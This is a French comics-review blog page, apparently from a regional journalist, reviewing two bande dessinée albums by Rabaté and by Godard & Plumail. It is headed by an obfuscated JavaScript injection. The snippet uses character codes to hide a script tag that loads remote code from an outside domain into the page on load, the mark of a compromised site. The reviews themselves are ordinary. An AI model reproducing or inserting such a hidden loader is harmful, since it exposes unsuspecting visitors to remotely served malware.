Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Vies ordinaires

    [media id=11 width=320 height=240]

    Une vie, ordinaire ou pas ?

    Le Petit rien tout neuf avec un ventre jaune.- Le Petit rien tout neuf avec un ventre jaune est le magasin de farces et attrapes de Patrick. Un Patrick en pleine déprime depuis le départ de sa femme car il « est une vraie merde qui en vend des fausses ». Résultat, les affaires périclitent et les plans de restructurations qui frappent les industries locales n’incitent pas à la rigolade.  Pourtant sa vie va faire le grand écart avec la rencontre d’une acrobate travaillant dans un cirque de passage. Mais, c’est connu, les gens du voyage ne font que des étapes…

    Pascal Rabaté est doté d’un double talent. Le premier est de trouver des titres impossibles pour ses livres et le second est de rendre intéressante une histoire banale et quotidienne. Au fil de ses albums, l’auteur s’affirme comme le peintre tendre et délicat d’une France provinciale et quotidienne. Pas de super-héros, pas de grandes intrigues romanesques, mais du vivant, du récit d’aujourd’hui. C’est vrai et c’est humain, ce qui est déjà beaucoup !

    Le Petit rien tout neuf avec un ventre jaune, Pascal Rabaté. Editions Futuropolis, 104 pages, 18 euros.


    Loin devant, jamais… Commercial dans l’univers de la BD, Sébastien à l’habitude des histoires bizarres mais rien ne l’avait préparé à ce qui lui arrive. Entré en possession d’un étrange appareil photo ayant appartenu à Maurice Leblanc il utilise cet appareil sur lui et découvre une photo de son futur : il va être assassiné dans deux mois ! Sébastien va donc essayer de changer son futur, mais il se retrouve vite pris entre deux factions opposées.

    Une intrigue intéressante et fertile en rebondissements. Une aventure qui se lit d’une traite même s’il est préférable de lire le premier tome avant celui-ci. Le scénario de Godart flirte avec la science-fiction en restant dans la ligne du polar. Le tout bien servi par le dessin agréable de Plumail qui confirme sa maîtrise d’un trait réaliste. Il n’y a plus qu’à attendre une suite que l’on espère du même niveau !

    Dédales, tome 2 : Loin devant, jamais… Christian Godard & Claude Plumail. Editions Glénat, 48 pages ; 13 €

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !
    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Stupor Mundi, album lumineux sur une camera obscura

    Stupor mundi, Néjib. Editions Gallimard, 288 pages, 26 euros. C’est du pouvoir des images ...

    Ah, ça lira !

    Ah, ça ira ! tome 1: le pain et la poudre, Jean-David Morvan (scénario), ...

    Avoir 20 ans et des galères de jeunes filles d’aujourd’hui

    Le bel âge, tome 1: désordre, de Merwan, éditions Dargaud, 72 pages, 14,99 euros. ...

    Des lendemains radieux ou en vert sombre ?

     Et nos lendemains seront radieux, Hervé Bourhis. Editions Gallimard BD, 80 pages, 18 euros. ...

    Premiers de cordée

    L’invention du vide, Nicolas Debon, éditions Dargaud, 80 pages, 16,45 euros. Dépassement de soi, ...

    Aurel sans complexes

    La droite complexée, Aurel, présentation Renaud Dély. Editions Glénat, 160 pages, 15 euros. Non, ...